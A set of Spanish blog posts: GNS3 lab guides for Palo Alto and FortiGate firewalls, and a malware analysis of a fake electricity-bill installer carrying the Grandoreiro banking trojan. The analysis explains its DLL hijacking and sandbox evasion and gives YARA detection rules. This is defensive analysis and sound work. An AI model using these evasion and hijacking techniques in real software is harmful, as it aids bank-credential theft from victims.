de plantillas de GNS3 con webterm seleccionado en la lista] Una vez dispongamos del Webterm , lo configuraremos con una IP estatica para poder acceder al Palo Alto, dando botón derecho en el , configuración de red, y quitando las almohadillas de comentarios, pondremos nuestra IP: [Imagen: IP estatica en GNS3] NOTA: Conectaremos con el enlace ( último icono del lado izquierdo de GNS3 ), sobre la interfaz de management del Palo Alto. Una vez linkado, podremos acceder a los equipos ( recordar https:// ) [Imagen: Acceso GUI a PAlo Alto] Recordemos el orden: 1. Añadir Webterm 2. Linkar con el interfaz de Management de Palo Alto 3. Cambiar la IP a estática del Webterm 4. Ya podríamos acceder a los equipos [Imagen: Captura de GNS3 mostrando el panel de Palo Alto vía TightVNC con la versión 10.1.6] ## Configurando Palo Alto y GNS3 para acceder a Internet Es poco probable que usemos una dirección con IP pública en GNS3 y enrutemos el tráfico. Al habilitar Internet en GNS3, obtendremos una dirección IP del rango de IP privado 192.168.137.0/24. Agregamos una nube a la topología del laboratorio. A la hora de agregarla, recibiremos un mensaje para elegir un servidor. Aquí debemos elegir nuestra máquina local como servidor y haremos clic en OK. Posteriormente podemos hacer clic derecho en la nube y configurar. Las ventanas de configuración de la nube nos mostrarán la lista de interfaces físicas que están presentes en la máquina. En mi máquina, podemos ver tres interfaces Ethernet. Eliminaremos los tres y marcaremos la opción, que dice mostrar interfaces especiales de Ethernet, con el fin de no confundir con la configuraciones, y dado que podremos tener distintas ( Podrían aparecernos las de VMware / Virtualbox ) o en nuestro caso Hyper-V, según lo que vayamos a utilizar. Tendremos que tener en cuenta, que debemos usar un interfaz que COMPARTA, y por ello lo pongo en mayúsculas, el acceso a internet. Que es exactamente compartir internet en el interfaz: En mi caso, como estoy usando una conexión por cable para Internet, clic derecho sobre ella (Ethernet) y marqué la opción que dice Permitir que otros usuarios de la red se conecten a través de la conexión a Internet de esta computadora. Luego seleccionamos el interfaz en base a lo que usemos como indique antes, después clic en OK. Solo estamos configurando la interfaz externa con una IP para probar si la asignación de IP de Internet funciona o no y si la máquina local puede compartir el acceso a Internet con Palo Alto, para ello: 1. Abrimos la GUI web de Palo Alto. 2. Vamos Network , y despues a Interfaces . 3. Hacemos clic en ethernet 1/1. Aquí al gusto - Cambiamos el tipo de interfaz a Layer3 y elegimos el enrutador como predeterminado. - En la Zona de seguridad, hacemos clic en Nueva Zona, donde se abrirá la ventana emergente de creación de zona. NOTA: En mi caso aparece la zona UNTRUSTED al tenerla creada [Imagen: Captura de Palo Alto creando una nueva zona de seguridad en la interfaz Ethernet] - En la ventana de creación de zona, nombre la zona como UNTRUSTED y hacemos clic en OK. [Imagen: Zona Untrusted Palo Alto] - Una vez creada, hacemos clic en IPv4, y marcamos la opción dependiente del interfaz que eligiésemos, o bien con asignación de IP estática o bien Cliente DHCP y haciendo clic posteriormente en OK. En mi caso, opté por IP estática ( Para VMware / VirtualBox es más intuitivo que Hyper-V ) [Imagen: IP Salida a Internet en Palo Alto] Para ello, debemos crear un objeto de dirección, que en mi caso lo llame "SALIDA INTERNET". Para hacernos un poco la vida más fácil. Durante la solución de problemas, es recomendable tener ICMP habilitado en las interfaces externas, para ello hacemos clic en la pestaña Advanced y clic en el menú desplegable Perfil de Administración, creando un nuevo perfil de gestión. Al igual que antes, tener en cuenta que yo ya tenia creado el perfil ( ALLOW PING ), y por ello me aparece. [Imagen: Crear Perfil en Palo Alto] Al crear el perfil , podremos asignar un nombre al perfil y marcar la opción Ping, haciendo clic en OK. [Imagen: Permitir Ping en Palo Alto] Cuando hagamos algunos cambios, para reflejar los mismos, debemos hacer un commit para confirmar, esto esta en la esquina superior derecha, pero os cuento una curiosidad que me volvía loco. Si no disponemos de la resolución correcta en nuestra Webterm ( Configuración del mismo en GNS3 ), el GUI de Palo Alto no mostraba correctamente los botones, haciendo dificil el commit: [Imagen: Error en commit en Palo Alto] Tras cambiar la resolución vemos como ya si que nos aparece: [Imagen: Solución error boton Commit Palo Alto] Pudiendo publicar todos los cambios realizados: [Imagen: Commit de todos los cambios realizados] Después de confirmar los cambios, debería poder ver la interfaz con el color verde que indica que la interfaz está conectada físicamente y está activa. [Imagen: Conexión salida a Internet] Con este laboratorio, ya podriamos empezar a trastear , agregando nuevas redes , equipos, o todo aquello que queramos, con el fin de poder irnos familiarizando con la intefaz de Palo Alto, para aquellos que no la conozcan. Iremos ampliando y vitaminando este laboratorio, a fin de ir familiarizando con el interfaz y las grandes capacidades que tenemos en los equipos de Palo Alto. Disfrutad del fin de semana / vacaciones para quien las tenga ( Entre los que me incluyo ) , aunque elija hacer un post ahora que tengo más tiempo. --- # Troyano bancario en la factura de la luz URL: https://ciberseguridad.blog/troyano-bancario-en-la-factura-de-la-luz/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2022-07-17 Actualizado: 2026-10-04 Tema: Herramientas para hackear > La factura de la luz trae muchos conceptos, y en ocasiones, alguno de ellos es un troyano bancario como Grandoreiro. ¡ CUIDADO ! Hola a tod@s! Siempre me da por buscar malware en las plataformas de sandbox online porque, normalmente, se ven cosas interesantes. He visto este fichero que, a priori, podrían corresponder a “facturas” de compañías que nunca, repito que nunca, te enviarían por correo un enlace o el mismo fichero adjunto para que lo descargues e instales. Hoy veremos este fichero instalable: [Imagen: EndesaFacrurnopago] Este es el archivo en cuestión : Archivo.EndesaFacturnopagoRef09-07-2022.MSI Como puede observarse en la salida de any.run no se ve gran cosa, así que trataremos de ir más allá y ver su contenido real, para que no nos la cuelen con estas cosas. [Imagen: Ejecuciones Factura Falsa Endesa] Este tipo de ficheros (MSI) se pueden descomprimir a un directorio y tendremos todo el contenido: [Imagen: Descomprimir MSI] Una vez dentro, nos fijamos en ficheros ejecutables (exe, dll, etc.), scripts varios (bat, py, ps1, etc.), lo que nos llame la atención. Esta DLL llama mucho la atención, será que es la única (xD es broma, hay otra). [Imagen: DLL maliciosa en factura de la luz] Compilada en Delphi, por lo que ya se puede intuir lo que vamos a ver: FACTURA + DELPHI = TROYANO BANCARIO (aunque no siempre). Esta DLL, básicamente, realiza unas comprobaciones sobre el entorno (idioma del teclado entre otros) y si le agrada, descarga el payload de una URL, normalmente cifrada o codificada, y después de dejarla en formato legible (zip en este caso) descomprime en algún directorio (%APPDATA%) y ejecuta su contenido. [Imagen: Descarga de payload URL troyano bancario] Una vez localizada la URL, procedemos a descargarla. Como os he comentado, el fichero descargado no tiene un formato adecuado, todavía, ese es el trabajo de la DLL, dejarlo de tal forma que pueda ser descomprimido. [Imagen: Transformación dll maliciosa a zip legible] Veamos que tiene dentro ese ZIP. [Imagen: Extración del troyano bancario muestras mas dlls maliciosas] Un fichero EXE y 3 DLL. Si os fijáis en las fechas, importante esto, dbghelp.dll se compiló el 12 de julio de 2022, hace muy poco, por lo que se intuye que esta podría tener algo interesante. Otra cosa es el tamaño, casi 300 megas, mucho ¿verdad? Si pensamos el porqué, podemos concluir que es una medida de protección ante cualquier sandbox online que permitan un tamaño limitado. Voy a renombrar esa DLL para que no sea cargada al ejecutar el EXE y veamos qué pasa: [Imagen: Renombrado de dll maliciosa y ejecución exe] Nos carga una aplicación legítima “Visual Web Developer Express”, sin más. Entonces podemos pensar que gracias a DLL Hijacking, sería cargada esa DLL (que hemos renombrado) y ejecutada por el EXE. [Imagen: Ejecucion de dll maliciosa mediante dll hijacking] Vemos en el procmon o Process Monitor como es así, dbghelp.dll es buscada antes en el PATH donde se encuentra el EXE que en su lugar esperado (directorio del sistema), por lo que se cargará antes. También, esa DLL, se podría haber llamado VERSION.DLL, dwmapi.dll o imageres.dll, por poner algún ejemplo más, y se hubieran cargado igualmente. La DLL también está compilada en DELPHI, coinciden tanto el downloader como el troyano. [Imagen: Observar comportamiento DLL] Y si echamos un vistazo al contenido de la DLL veremos porqué es tan grande, es debido a esas 2 imágenes incluídas dentro de los archivos de recursos: [Imagen: Imagenes grandes para evitar las sandbox limitadas] En los casos en los que analizamos programas en DELPHI, es mejor utilizar la herramienta “Interective Delphi Reconstructor”, el porqué es simple, es el que más información da sobre el binario. Podemos ver hasta el aspecto de la aplicación. [Imagen: Interective Delphi Reconstructor] Los diferentes ficheros “unit” y su contenido según funciones de llamadas a API. [Imagen: Llamadas API troyano bancario] Para asegurarnos de lo que estamos viendo, buscamos las strings o cadenas que nos parezcan interesantes: [Imagen: Strings de busqueda en troyano bancario] Y aquí las tenemos, los bancos a los que está destinados este troyano bancario (como habíamos intuído), que según lo que vemos corresponde con GRANDOREIRO. Se le llamó así por el tamaño tan grande que tiene y por su país de origen. Parece que, además de España y Portugal, se le ha añadido Argentina como posible objetivo. [Imagen: Bancos de Argentina y portugal de grandoreiro] Podéis leer sobre este tipo de troyanos en la web de INCIBE, concretamente en este paper , ahí veréis más detalles. Este artículo sólo pretendía identificar qué tipo de amenaza se escondía detrás de esas “Facturas” que aparecen en diferentes sandbox online. Estas variantes van cambiando según salen nuevas funcionalidades o reglas yara que las identifican para tratar de pasar desapercibido. Como es el caso de esta muestra, modifican su código para evitar detecciones. Voy a cambiar el valor de all a 20 “and all of ($str*)”: ``` rule Grandoreiro_Banker_Trojan { meta: author = "INCIBE-CERT" description = "Detecta el troyano bancario Grandoreiro - modificada" strings: $mzp = "MZP" $str1 = "yIdIOHandlerSocket" $str2 = "ATIVARCAPTURAFULL" $str3 = "ATIVARCAPTURAMAG" $str4 = "AutoSessionsPingT" $str5 = "v4.09 (2013.Q2)" $str6 = "CallNextHookEx" $str7 = "Cap.DfbBackingMode" $str8 = "CryptPlugin.AfterDisconnect" $str9 = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly" $str10 = "DELETAKL" $str11 = "DETONAPROCESSO" $str12 = "EXIBIRMZ" $str13 = "Gate_CryptPlugin" $str14 = "GetType method not available for TRtcDataRow" $str15 = "GUploadAnywhere_Super" $str16 = ".hopto.org" $str17 = "Magnification.dll" $str18 = "RTC.DATASET.ROWS" $str19 = "Portable network graphics (AlphaControls)" $str20 = "RemoteThreadCallbacks TRtcThreadCallback.DestroyCallback" $str21 = "SUSPENDEACESSO" $str22 = "ZDecompress_str.InflateInit" condition: $mzp at 0 and 20 of ($str*) and (filesize > 140000KB and filesize < 400000KB) } ``` Con el tema de los downloaders, la cosa se complica ya que se puede descargar de cualquier manera, por lo que se puede variar mucho su código y si utilizas una versión de DELPHI más actual, pues más todavía. Una detección de hace 3 meses puede no ser efectiva a día de hoy. Aprovechando la yara que aparece en el post de INCIBE voy a añadir varias líneas más y cambiar el número de las detecciones para las cadenas. ``` rule Grandoreiro_Banker_Downloader { meta: author = "INCIBE-CERT" description = "Detecta el Downloader del troyano bancario Grandoreiro - actualizada" strings: $delphidll1 = { BA ?? ?? ?? ?? 83 7D 0C 01 75 ?? 50 52 C6 05 ?? ?? ?? ?? ?? 8B 4D 08 89 0D ?? ?? ?? ?? 89 4A 04 } $delphidll2 = { 55 8B EC 83 C4 ?? B8 ?? ?? ?? ?? E8 ?? ?? FF FF E8 ?? ?? FF FF 8D 40 00 } $str1 = " 2001, 2002 Mike Lischke" $str2 = "8$4,6-9'$6.:*?#1pHhX~AeSlZrNbS" $str3 = "Archive already has SFX stub" $str4 = "Deflate64 compression method is not supported" $str5 = "Delphi Component" $str6 = "EDecompressionErrorneed dictionary" $str7 = "MakeSFX error" $str8 = "Runtime error at 00000000" $str9 = "Web site: http://www.componentace.com" $str10 = "ScreenToClient" $str11 = "SFXStub property is not specified" $str12 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" $str13 = "SystemParametersInfoA" $str14 = "TAESCryptoTransform" $str15 = "TGetSiteInfoEvent" $str16 = "$TMultiReadExclusiveWriteSynchronizer" $str17 = "to create a commercial product, please register and download" $str18 = "URLDownloadToFileA" $str19 = "VerLanguageNameA" $str20 = "WndProcPtr%.8X%.8X" $str21 = "you that your Personal Edition is provided for personal usage only." $str22 = "Zip64Mode" $str23 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" wide $str24 = "Imploded(TERSE)" wide $str25 = "PPMd version I, Rev 1" wide $str26 = "\\Software\\Embarcadero\\FireDAC" wide $str27 = "%d.%d.%d (Build %d)%s" wide $str28 = "#32770" wide $str29 = "EXECUTE PROCEDURE sp_mgGetInstallInfo()" wide $str30 = "Found [%s]GWarning: The client [%s] and server [%s] major versions difference > 1." wide $str31 = "Windows Server 2008 Windows 7" wide $str32 = "Windows Server 2016 Windows 8" wide $str33 = "Row deleting disabled+Application must have only single FDManager" wide $str34 = "(Version %1:d.%2:d, Build %3:d, %5:s)" wide condition: uint16(0) == 0x5A4D // MZ and uint16(uint32(0x3C)+0x18) == 0x010B //MZ header en 0x3C and (uint16(uint32(0x3C)+0x16) & 0x2000) == 0x2000 //PE DLL signature and any of ($delphidll*) and 15 of ($str*) and (filesize > 1400KB and filesize < 5000KB) } ``` Vemos que funciona. ``` $ yara grandoreiro_incibe.yar . Grandoreiro_Banker_Downloader ./Binary.Velholpn.dll Grandoreiro_Banker_Trojan ./dbghelp.dll ``` Espero que os haya gustado, nos vemos en el siguiente post!! --- # Creando nuestro laboratorio de FortiGate en GNS3 URL: https://ciberseguridad.blog/creando-nuestro-laboratorio-de-fortigate-en-gns3/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2022-06-29 Actualizado: 2026-10-04 Tema: Laboratorios de ciberseguridad > Montamos nuestro Firewall Fortigate en GNS3, uno de los emuladores más extendido a la hora de crear PoCs, y con el que podremos crear nuestros laboratorios. Hoy hablaremos de unos de los mejores emuladores de sistemas de red, que no puede faltar a la hora de preparar nuestras PoC de ciberseguridad. En este caso, os lo acercamos con la instalación de un firewall Fortinet, y un pequeño ejemplo, pero los conceptos del post, podremos trasladarlo a cualquier otro fabricante, incluso sistema. Hay cientos de dispositivos de red compatibles con gns3 para que podáis contruir vuestros laboratorios. Donde el Firewall FortiGate está entre ellos. Podemos instalar el firewall de FortiGate en gns3 obteniendo la imagen de KVM del sitio web de FortiGate e instalarla directamente en el servidor remoto gns3vm o GNS3. > Para un mejor rendimiento, os recomiendo que instaleis el firewall FortiGate en un servidor remoto en lugar de gns3vm. El problema con gns3vm es que hace virtualización anidada, lo que significa virtualización sobre virtualización. Esto degradará el rendimiento del propio firewall ( Todo dependerá de donde queramos llevar nuestra PoC ). Si no nos preocupa el rendimiento, podemos continuar con la instalación de FortiGate VM en GNS3VM, pero como os digo, todo dependerá de la hasta que punto queramos llevar nuestros laboratorios. Por ejemplo, si queremos probar firmas, reglas snort, módulos de IDS/IPS o solo probar algún concepto de VPN, Configuración propia del FW o similar. ## Cómo instalar un firewall FortiGate en GNS3. 1. Descargar la imagen KVM de FortiGate. 2. Descargar el archivo del disco duro vacío. 3. Instalar FortiGate en GNS3. 4. Establecer la contraseña para el Fortigate. 5. Obtener la interfaz y la IP de los equipos. ### Descargar la imagen KVM de FortiGate Una de las mejores cosas de FortiGate es que, a diferencia de otros proveedores, el tamaño de su software es muy pequeño ( aproximadamente 73 Mb ), es sorprendente cómo agregan tantas funciones a un paquete de software tan pequeño. Además, y de ahí por lo que he elegido Forti, no necesita tener un acuerdo de servicio para descargar la imagen, lo cual es realmente bueno para quien no tenga otras opciones. Para descargar la imagen de FortiGate, - Ir al enlace aquí . - Iniciar sesión en la página, y si no disponeros de una cuenta, podéis registraros para obtener una, volviendo al enlace anterior para iniciar sesión. - Después de iniciar sesión, obtendremos múltiples opciones para descargar el software FortiGate, haciendo clic en las imágenes de VM: [Imagen: Descarga Imagen VM Fortigate] - Posteriormente, podremos elegir el producto Fortigate que necesitemos en el lado izquierdo y KVM como plataforma: [Imagen: Nuevo desplliegue GNS3 Fortigate] En el momento de escribir este posts, 7.2.0 es la última versión. Haz clic en descargar en la nueva opción de implementación entre las dos opciones de descarga, Actualizar ( Si disponemos de otra versión ) y Nuevo despliegue, que será nuestro caso. ### Descargar el archivo del disco duro vacío. Podemos descargar el archivo del disco duro virtual vacío desde este repositorio , también podríamos crear el archivo de disco duro vacío dentro de GNS3, pero como no es el fin del posts, creo que es mejor que optemos por su descarga directamente. Con la imagen de FortiGate y la descarga del archivo del disco duro virtual, ya podemos instalar la máquina virtual de FortiGate en GNS3. ### Instalción del FW FortiGate en GNS3. Abre GNS3 en el ordenador. En este caso, vamos a optar por la parte más sencilla, que es obtenerlo de las propias plantillas, pero recordar que podríamos instalar y que en algún caso recomendamos la propia maquina ( recordando la problemática de la virtualización aninada ) - Haz clic en File. - En dispositivos de seguridad, haga clic en Nueva plantilla. - En el asistente Nueva plantilla, - Elige Instalar un dispositivo desde GNS3 VM (En mi caso lo tengo asi por defecto) y hacemos clic en Siguiente. - Buscamos nuestros dispositivo FortiGate. - Cuando comiences a escribir FortiGate, verás el dispositivo FortiGate debajo del firewall, pero como podeís ver, la versión de la que dispone GNS3, posiblemente sea inferior a la que nos bajamos, por lo que procederemos a instalar la que nos hemos bajado: [Imagen: Crear nuev versión Fortigate en GNS3] Tras darle a crear una nueva versión, recibiremos otro aviso para nombrar el disco duro virtual principal de FortiGate. Y es aquí donde dentra en juego la última versión que nos hemos descargado. Cuando nos descargamos el fichero de Fortigate, tenemos que extraer el archivo, donde el nombre del archivo era fortios.qcow2 (Lo dejamos así, pero podría renombrarse). [Imagen: Imagen descargada de Fotigate 7.2.0] Por ello, escribimos fortios.qcow2 y hacemos clic en Aceptar. ( No es necesario dejar el archivo en algun Path concreto, ya que GNS3 procederá a realizar la búsqueda ): [Imagen: fortios.qcow2] En el segundo disco duro virtual, dejamos el nombre de disco predeterminado 'empty30G.qcow2' y hacemos clic en Aceptar: [Imagen: Disco vacio para GNS3] Una vez que se haya importado, ya estaremos listos para instalar el software. Elegimos la versión y hacemos clic en instalar: [Imagen: Fortigate 7.2.0 GNS3] En el aviso, nos indicará ¿Le gustaría instalar FortiGate versión 7.2.0? Elegimos sí y haga clic en Finalizar. Recibiremos la confirmación de que la instalación ya ha finalizado y podremos encontrar las imágenes en dispositivos de seguridad: [Imagen: Fortigate 7.2.0 en GNS3] Os dejo un video en el que explica muy bien, como configurar GNS3 VM para virtualizar fuera del propio GNS3, con las consiguientes ventajas: [Vídeo: Como instalar y configurar GNS3 + VM](https://www.youtube.com/watch?v=IVbNv8u7278) ### Establecer la contraseña para el fortigate Tras instalar la máquina en GNS3, nos indica que la contraseña del equipo es admin y sin contraseña, por lo que lo ideal (Teniendo en cuenta que es una PoC) , es cambiar la password. Hemos instalado con éxito el firewall FortiGate en gns3, por lo que ya podemos crear un nuevo proyecto, para ello, arrastramos y soltamos el firewall FortiGate a la topología. [Imagen: Arrancar Fortigate] Hacemos clic derecho en FortiGate VM e iniciamos. O podemos hacer doble clic en el firewall de FortiGate para ingresar a la CLI. Nos pedirá que ingresemos las credenciales, ingresamos el nombre de usuario como "admin" y dejamos la contraseña en blanco, nos pedirá que configuremos una nueva contraseña. Ingresamos la nueva contraseña y confirmamos la contraseña con enter: [Imagen: Cambio de contraseña en Fortigate] Con esto, ya hemos cambiado con éxito la contraseña de la máquina virtual. Cada vez que arrastremos y soltemos un nuevo firewall FortiGate en la topología, activará una nueva máquina virtual sin ninguna configuración, por lo que deberemos restablecer la contraseña cada vez que deseemos configurar un laboratorio. ### Obtener la interfaz y los detalles de IP Podemos validar que la instalación se realizó correctamente ingresando a la configuración del equipo. Para obtener los detalles de configuración de la interfaz escribimos: ``` show system interface ``` Como podemos ver, el puerto 1 está habilitado con acceso de administración como HTTPS y SSH. IMPORTANTE: Como no tenemos la licencia de FortiGate, no podemos acceder a la GUI de FortiGate mediante HTTPS, por lo que debemos tener en cuenta agregar http para permitir el acceso en la interfaz de administración. Como dato curioso, el no disponer de licencia, tambien nos limita no solo el numero de cores, si no en un caso que me pasó recientemente , tambien el cifrado que podemos poner en las VPNs, claro está, a fin de no dejarlo en producción. [Imagen: show system interface] A diferencia de otros proveedores, si desea ver la dirección IP de nuestro firewall FortiGate, debemos escribir el comando: ``` diagnose IP address list ``` Como podemos ver, ninguna IP está configurada ahora mismo en el equipo, y si hemos conectado el puerto 1 a un servicio dhcp, hubiésemos obtenido una dirección IP y podríamos ver los detalles de la dirección IP aquí, pero todo ello, lo veremos mientras montamos nuestro laboratorio. ## Crear un laboratorio de FortiGate con GNS3 Ya hemos visto, cómo poder construir nuestro laboratorio instalando un Firewall Fortigate, pero un equipo por si solo, nos sirve de poco, por lo que montaremos un escenario realista a fin de ver como podríamos usar GNS3 para nuestros laboratorios. Esta es la topología de red que vamos a construir: [Imagen: Topología de red de GNS3 con Fortigate] La interfaz WAN del firewall FortiGate está conectada a Internet y el lado LAN está conectado a un conmutador que atiende el tráfico LAN. Los usuarios de LAN saldrán a Internet utilizando el firewall FortiGate al final de la configuración. Podemos ampliar aún más el laboratorio agregando varios firewalls FortiGate mediante IPsec VPN por ejemplo para simular la conectividad de una sucursal, o incluso metiendo otra capa de FW a mayores distinta. Las posibilidades son infinitas. Antes de continuar, debemos asegurarnos que hemos descargado e instalado el firewall FortiGate en Gns3 como hemos visto anteriormente. ### Creando un nuevo proyecto GNS3 Una vez instalado con éxito FortiGate en GNS3. Ya podemos poner en marcha un pequeño laboratorio con la topología de red indicada. Cuando agregamos el firewall FortiGate al GNS3, se nos agregarán diez interfaces virtuales (Las del propio equipo). Sin embargo, no requerimos las diez interfaces para este laboratorio. Podríamos usar el Port1 para la red LAN más la red de gestión. Port2 para la conexión a internet. > En producción, debemos tener una LAN y la interfaz de administración separadas. - En GNS3, hacemos clic en File y hacemos clic en "nuevo proyecto en blanco". - Proporcionamos un nombre de proyecto y la ubicación donde deseamos guardar los archivos del proyecto y haciendo clic en Aceptar posteriormente. [Imagen: Nuevo proyecto de Fortigate en GNS3] ## Configuración inicial de Fortigate Primero configuraremos y prepararemos el firewall FortiGate, y cuando este listo, conectaremos cada puerto. ### Encender el cortafuegos Parece algo logico, pero sería el primero de los pasos, para ello, arrastra y suelte el firewall en la topología como hemos visto, sobre el mismo, hacemos clic derecho sobre él y clic en Iniciar. Después de unos segundos, el firewall se cargará y solicitará el nombre de usuario. ### Cambiar contraseña Fortigate Lo hemos visto un poco más arriba, pero lo refrescamos de nuevo, para seguir la secuencia correctamente. Por defecto en Fortigate, debemos ingresar el nombre de usuario como "admin", y dejarmos la contraseña en blanco. Nos pedirá que configuremos una contraseña en nuestro FortiGate. Ingresamos la nueva contraseña y confirmamos la misma. Después de cambiarla, podremos iniciar sesión en nuestra "máquina virtual de FortiGate" con el nombre de usuario admin y la contraseña que acabamos de crear. [Imagen: Cambio de contraseña inicial en Fortigate] ### Configurar el Port1 y habilitar HTTP en Fortigate Tenemos que configurar la dirección IP en la interfaz LAN. De esa manera, podemos acceder a la GUI web usando la IP de LAN. De manera predeterminada, el firewall de FortiGate tiene habilitado el acceso HTTPS (Como debe ser) para fines de administración en el Port1. Sin embargo, no podemos usar la GUI web usando HTTPS porque estamos ejecutando una licencia de prueba que será válida solo por 16 días, por lo tanto, debemos habilitar http en el Port1. Podemos escribir: ``` show system interface port1 ``` y podemos ver que el puerto uno, está habilitado con ping, https, ssh y fgfm: [Imagen: Habilitar HTTP en Fortigate] El puerto 1 del firewall está habilitado con el modo estático, sin embargo, no se configura ninguna dirección IP. Vamos a configurar 10.1.1.1/24 en el puerto LAN del Fortigate, también haremos que el rol del puerto LAN sea LAN. ``` Config system interface Edit port1 set mode static set ip 10.1.1.1 255.255.255.0 set role lan ``` Posteriormente podremos habilitar el acceso http en el Port1 con los siguientes comandos: ``` config system interface edit "port1" set allowaccess ping http ssh fgfm next end ``` IMPORTANTE: Debemos asegurarnos de agregar todos los puertos que deseemos, si solo agregamos http, se eliminarán los otros protocolos. Antes de continuar, verificamos la configuración en el puerto 1 escribiendo el comando "show system interface port1": [Imagen: Acceso HTTP en Fortigate] ### Configurar el Port2 para WAN en Fortigate Usaremos el servicio DHCP en el lado WAN del firewall y, de forma predeterminada, como podéis ver, no está configurado: [Imagen: Configuración del port2 inicial en Fortigate] Por lo que lo configuraremos para usar DHCP: ``` config system interface edit "port2" set mode dhcp set role wan end ``` Con esto, tendríamos la configuración inicial del equipo Fortigate, pudiendo continuar. Necesitamos configurar el host LAN para comunicarse con el lado LAN del firewall, para eso tenemos que ser parte de la red 10.1.1.0/24. Configurando cualquier dirección IP de esa subred y deberíamos poder llegar al lado LAN del Fortigate. Podremos llegar al Fortigate a través de ICMP, porque ya permitimos hacer ping en el lado de la LAN. [Imagen: Configuración GNS3 en CMD equipo Windows] Con ello, y sabiendo que llegamos al equipo, podemos escribir http://10.1.1.1 en nuestros equipo LAN para acceder a la GUI web del cortafuegos. IMPORTANTE: No intentes acceder a la GUI mediante HTTPS. Recuerda que como no tenemos licencia, no podemos acceder a ella y, además, eliminamos anteriormente el HTTPS de la configuración del puerto. Ingresamos el nombre de usuario y la contraseña que establecimos anteriormente. [Imagen: Acceso GUI a Fortigate vía HTTP] Hemos configurado la dirección IP de la máquina con Windows de forma estática, pero esa no es la forma correcta de administrar la dirección IP en el lado de la LAN. En su lugar, necesitamos usar un servidor DHCP o habilitar el servicio DHCP en el puerto LAN. En la GUI > LAN >Port1 > Hacemos doble clic sobre él. Nos desplazaremos hacia abajo y marcamos la casilla del servidor DHCP. Podríamos cambiar el rango de direcciones si queremos, en nuestro caso, estamos dejando todo esto por defecto. [Imagen: Configurar servidor DHCP en Forigate] Claro está, después de la configuración, hacemos clic en Aceptar. Una vez configurado, verificamos la configuración del DHCP. En este momento, ya podemos agregar otro host con DHCP habilitado para conectarse al lado LAN del firewall o eliminar la IP estática en el host de Windows y permitir DHCP. Aunque podríamos conectar otro host, cambiaremos la dirección IP de Windows a DHCP. Después de realizar los cambios, como podemos ver, el host de Windows obtuvo una dirección IP 10.1.1.2 del servicio DHCP de FortiGate. Los servidores DNS que ve son de los firewalls de FortiGate. [Imagen: IP asignada por Fortigate en DHCP] ## Conectar el Firewall Fortigate a Internet Hemos configurado el lado LAN del firewall Fortigate, de forma que, cuando agreguemos más y más hosts, el FortiGate comenzará a actuar como servidore DHCP y entregará las direcciones IP. Pero esos hosts no pueden salir a Internet porque no hemos conectado el firewall a Internet. Estamos esperando que el ISP proporcione conectividad pública a Internet. [Imagen: Salida a Internet de Fortigate atraves de VMware] Tan pronto como Cloud1 se conectó al puerto WAN (Port2) del firewall, obtuvimos una dirección IP. [Imagen: Captura de terminal FortiGate mostrando la IP 192.168.137.197 resaltada en el listado] Dado que adquirimos la dirección IP a través de DHCP, también tendremos configurada la puerta de enlace predeterminada que actuará como una ruta predeterminada para el firewall, por lo que cuando intentemos hacer ping en Internet, deberíamos obtener respuesta. [Imagen: Execute Ping en Fortigate] ## Configurando el lado LAN de FortiGate para el acceso a Internet El acceso a Internet ahora está disponible en el lado del Fortigate. Aún así, debemos configurar la política de seguridad y la configuración del NAT para que el host LAN salga a Internet utilizando el enlace de Internet de FortiGate. Al crear la Política, debemos llamar a la subred de la interfaz LAN a la Política, por lo que es mejor mantener el objeto de dirección listo antes de continuar con la creación de la política en: Política y Objetos > Direcciones >Crear Nuevo >Dirección [Imagen: Crear objeto red en Fortigate] Como hemos indicado, una vez creado el objeto, crearemos el NAT para permitir el acceso. La política de seguridad permitirá el tráfico de adentro hacia afuera, pero cuando el tráfico sale de la LAN sería una dirección IP privada, y cuando tiene que salir, la dirección IP debe traducirse a una dirección IP pública. Por lo tanto, necesitamos configurar el NAT en la misma política de seguridad. En Firewall/Opciones de red, marcamos la opción NAT y en Configuración del conjunto de direcciones IP: Usar dirección de interfaz saliente (Que será nuestra IP Pública). [Imagen: Crear NAT en Fortigate] Estamos usando una IP privada en el lado WAN del firewall, por lo que cuando la IP privada 192.168.137.0/24 sale del firewall, se traduce nuevamente a la dirección IP del host y la dirección IP del host se traduce a mi dirección IP WAN del router y luego va a Internet, es una locura cuando lo piensas, pero así es como funciona. Para ver los registros de tráfico, podemos consultarlos LogAllowedTraffic y eligiendo "Todas las sesiones". Policy & Objects > IPv4 Policy [Imagen: Activar Logs en Fortigate] Antes de hacer clic en Aceptar, podemos comenzar a hacer ping a cualquier IP pública desde nuestro host LAN, y tan pronto como apliquemos la configuración, deberíamos obtener una respuesta. Hacemos clic en Aceptar y, como podemos ver, recibimos una respuesta al ping, lo cual es fantástico. [Imagen: Ping a Google desde el equipo conectado a Fortigate] Podemos verificar la ruta de seguimiento (tracert) y deberíamos ver que el tráfico está pasando por su firewall Fortigate. [Imagen: Salida a Internet por el Fortigare Tracert] También podemos ver los registros en Log Report > Forwarded Traffic, para ver todo el tráfico que se inicia desde el host de Windows que conectamos al firewall: [Imagen: Log de salida a internet Fortigate] Hemos implementado con éxito el laboratorio de firewall FortiGate en GNS3, y ahora, podemos expandir desde este punto en otro laboratorio, por ejemplo a configurar IPsec VPN, configurar el HA entre dos equipo, etc. Cuanto más nos manchemos las manos, mejor comprenderemos la tecnología. Pero antes de profundizar en alguna tecnología, a ver si os puedo traer esta misma configuración para otros equipos. Estoy pensando en Palo Alto, que me viene genial por un proyecto en el que estoy inmerso, y que el cliente lo agradecería notablemente. Espero que disfrutéis de GNS3, que nos da un sinfín de posibilidades de montar nuestros laboratorios. --- # Hacker Simulator y más donde practicar hacking ético URL: https://ciberseguridad.blog/hacker-simulator-y-mas-donde-practicar-hacking-etico/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2022-06-13 Actualizado: 2026-10-08 Tema: Capture The Flag o Reto de Ciberseguridad > Existen muchas formas de aprender hacking ético, pero una de las mejores son los Hacker Simulator o plataformas vulnerables donde poder practicar La brecha de habilidades en ciberseguridad está incrementando. Las compañías precisan profesionales de ciberseguridad para proteger las redes y sistemas. Entonces, ya bien sea que estés empezando en ciberseguridad o seas un experto, precisas trabajar continuamente para practicar y mejorar tus habilidades en hacking ético. Crece la brecha en habilidades de ciberseguridad, pero también crece notablemente la cantidad de vulnerabilidades, vectores de ataque y técnicas. Las compañías 